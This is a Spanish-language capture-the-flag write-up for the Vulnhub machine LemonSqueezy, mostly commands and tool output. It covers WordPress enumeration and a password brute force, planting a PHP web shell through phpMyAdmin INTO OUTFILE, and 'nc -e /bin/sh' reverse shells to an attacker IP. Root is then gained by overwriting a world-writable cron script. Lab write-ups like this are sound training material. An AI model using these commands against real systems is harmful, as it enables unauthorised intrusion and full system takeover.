[VLN] LemonSqueezy

Hoy vamos a hackear la maquina de Vulnhub llamada LemonSqueezy. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/lemonsqueezy-1,473/

Video

Enumeration

Empezamos con un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 192.168.1.10 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-06 21:29 CEST Nmap scan report for lemonsqueezy.home (192.168.1.10) Host is up (0.00054s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Apache2 Debian Default Page: It works Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.42 seconds

Vemos que solo tiene el puerto 80 abierto, asi que vamos a profundizar un poco mas.

sml@Cassandra:~$ gobuster dir -u http://192.168.1.10 -w /usr/share/wordlists/dirb/big.txt =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://192.168.1.10 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/05/06 21:30:00 Starting gobuster =============================================================== /.htpasswd (Status: 403) /.htaccess (Status: 403) /javascript (Status: 301) /manual (Status: 301) /phpmyadmin (Status: 301) /server-status (Status: 403) /wordpress (Status: 301) =============================================================== 2020/05/06 21:30:03 Finished ===============================================================

Tiene un par de directorios interesantes, wordpress y phpmyadmin. Exploramos el wordpress a ver si podemos sacar algo de informacion:

sml@Cassandra:~$ wpscan --url http://192.168.1.10/wordpress --enumerate u _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ Â® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.1 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] It seems like you have not updated the database for some time. [?] Do you want to update now? [Y]es [N]o, default: [N][+] URL: http://192.168.1.10/wordpress/ [192.168.1.10] [+] Started: Wed May 6 21:33:00 2020 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.25 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://192.168.1.10/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_acce ss [+] http://192.168.1.10/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://192.168.1.10/wordpress/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://192.168.1.10/wordpress/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13). | Found By: Emoji Settings (Passive Detection) | - http://192.168.1.10/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9' | Confirmed By: Meta Generator (Passive Detection) | - http://192.168.1.10/wordpress/, Match: 'WordPress 4.8.9' [i] The main theme could not be detected. [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <=============================================================================== ========> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] orange | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] lemon | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Wed May 6 21:33:02 2020 [+] Requests Done: 26 [+] Cached Requests: 26 [+] Data Sent: 6.488 KB [+] Data Received: 227.2 KB [+] Memory used: 110.84 MB [+] Elapsed time: 00:00:01

Encontramos a los usuarios orange y lemon :) Hacemos bruteforce a la password de orange usando rockyou.

sml@Cassandra:~$ wpscan --url http://192.168.1.10/wordpress --passwords rockyou.txt --usernames orange â€“max-threads 50 _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ Â® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.1 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://192.168.1.10/wordpress/ [192.168.1.10] [+] Started: Wed May 6 21:39:55 2020 Interesting Finding(s): [+] Headers | Interesting Entry: Server: Apache/2.4.25 (Debian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://192.168.1.10/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_acce ss [+] http://192.168.1.10/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://192.168.1.10/wordpress/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://192.168.1.10/wordpress/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13). | Found By: Emoji Settings (Passive Detection) | - http://192.168.1.10/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.8.9' | Confirmed By: Meta Generator (Passive Detection) | - http://192.168.1.10/wordpress/, Match: 'WordPress 4.8.9' [i] The main theme could not be detected. [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 <=============================================================================== =========> (21 / 21) 100.00% Time: 00:00:00 [i] No Config Backups Found. [+] Performing password attack on Xmlrpc against 1 user/s Trying orange / ginger Time: 00:00:02 <=============================================================================== ===========> (165 / 165) 100.00% Time: 00:00:02 [SUCCESS] - orange / ginger [!] Valid Combinations Found: | Username: orange, Password: ginger [!] No WPVulnDB API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up [+] Finished: Wed May 6 21:40:18 2020 [+] Requests Done: 189 [+] Cached Requests: 26 [+] Data Sent: 90.547 KB [+] Data Received: 104.191 KB [+] Memory used: 930.492 MB [+] Elapsed time: 00:00:22

Obtenemos la pass "ginger". Nos logueamos en wordpress con los credenciales de orange/ginger, en posts, hay un draft "keep this safe!" que contiene: n0t1n@w0rdl1st! Tiene pinta de ser una password :) Entramos en http://192.168.1.10/phpmyadmin/ y usamos los credenciales orange/n0t1n@w0rdl1st! para loguearnos.

Exploitation

Una vez dentro del phpmyadmin, vamos a crear un fichero "b.php" que utilizaremos para obtener una reverse shell, asi que, abrimos "console" y ponemos:

SELECT "" into outfile "/var/www/html/wordpress/b.php"

Ponemos nc a la escucha:

sml@Cassandra:~$ nc -nlvp 5555

Y visitamos: http://lemonsqueezy/wordpress/b.php?cmd=nc -e /bin/sh 192.168.1.148 5555

Low Shell

sml@Cassandra:~$ nc -nlvp 5555 listening on [any] 5555 ... connect to [192.168.1.148] from (UNKNOWN) [192.168.1.10] 42244 python -c 'import pty; pty.spawn("/bin/sh")' $ id uid=33(www-data) gid=33(www-data) groups=33(www-data)

Ya estamos dentro :)

user.txt

$ cd /var/www $ ls html user.txt $ cat user.txt TXVzaWMgY2FuIGNoYW5nZSB5b3VyIGxpZmUsIH

Post-Exploitation

Exploramos el sistema y vemos que tenemos permiso de escritura en /var/www/html/wordpress. Nos descargamos el fichero linpeas.sh[1] y vemos la salida a ver si nos muestra algo interesante...

$ cd /var/www/html/wordpress $ wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scrip ts-suite/master/linPEAS/linpeas.sh --2020-05-28 07:04:56-- https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scrip ts-suite/master/linPEAS/linpeas.sh Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.132.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.132.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 225621 (220K) [text/plain] Saving to: 'linpeas.sh' linpeas.sh 100%[===================>] 220.33K --.-KB/s in 0.1s 2020-05-28 07:04:56 (2.17 MB/s) - 'linpeas.sh' saved [225621/225621] $ chmod +x linpeas.sh ----SNIP---- SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin */2 * * * * root /etc/logrotate.d/logrotate ----SNIP----

Privilege Escalation

Vemos que hay una tarea que se ejecuta cada 2 minutos. Se ejecuta /etc/logrotate.d/logrotate como root.... Miramos que podamos modificar el fichero:

$ ls -l /etc/logrotate.d/logrotate -rwxrwxrwx 1 root root 101 Apr 26 14:45 /etc/logrotate.d/logrotate

Vemos que si :) Lo modificamos para obtener una reverse shell como root... Ponemos nc a la escucha:

sml@Cassandra:~$ nc -nlvp 6666

Modificamos el script, y esperamos 2 minutitos...

$ echo "#!/usr/bin/env python" > /etc/logrotate.d/logrotate $ echo "import os" >> /etc/logrotate.d/logrotate $ echo "os.system('nc -e /bin/sh 192.168.1.148 6666')" >> /etc/logrotate.d/logrotate

Y despues de la espera...

sml@Cassandra:~$ nc -nlvp 6666 listening on [any] 6666 ... connect to [192.168.1.148] from (UNKNOWN) [192.168.1.10] 33404 python -c 'import pty; pty.spawn("/bin/sh")' # id uid=0(root) gid=0(root) groups=0(root)

root.txt

# cd /root # ls root.txt # cat root.txt NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=

End

Y con esto ya seriamos root de la maquina :) [1]https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/linpeas.sh